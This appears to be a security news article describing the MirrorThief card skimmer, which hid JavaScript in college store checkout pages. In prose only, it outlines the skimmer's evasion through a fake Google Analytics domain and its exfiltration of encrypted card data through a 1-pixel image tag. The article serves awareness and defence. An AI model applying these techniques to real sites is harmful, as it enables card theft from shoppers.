MirrorThief Card Skimmer

Card-skimming operations are nothing new in the world of cybercrime. Shady individuals have been carrying out such attacks for years. They would collect credit card information and then sell it on the Deep Web or various hacking sites. Recently, it was reported that a total of 201 US and Canadian college online stores had been a victim of a card-skimming attack.

Previously, there has been a very similar operation carried out by a hacking group called Magecart. However, when inspected, this new threat did not seem to fit the profile and experts concluded that this must be the creation of a newly emerging hacking group, which they called Mirrorthief. The MirrorThief Card Skimmer hides in the JavaScript at the checkout of the infiltrated websites. It appears that the attackers have created their threat to target PrismWeb based payment page specifically as this is the e-commerce platform, which is used by campus stores. This is rather unusual because cybercriminals do not tend to limit their options and create card skimmers normally, which are capable of infecting more platforms rather than just one. MirrorThief Card Skimmer collects all the sensitive data it could get its hands on – credit card numbers, verification numbers, card type, expiry date, the name of the holder, as well as their address and phone number.

The MirrorThief Card Skimmer manages to stay under the radar by mimicking the Google Analytics service. The attackers had even gone as far as to create a domain for their threat that is meant to resemble the legitimate Google Analytics website closely.

The skimmed payment details are stored into a JSON file. To secure the file, the attackers use AES encryption and base64 encoding before beginning the transfer. The skimmer's code will then create an HTML image tag on the compromised server that contains an URL to the attacker’s server, as well as additional parameters that are used to append the encrypted JSON file. The image.tag itself works with a 1-pixel image so that it is impossible to notice it without taking a very close look at the page's source code.

These attacks are not uncommon, and online stores need to follow the latest cybersecurity trends to ensure the safety of their customers as this is their responsibility entirely.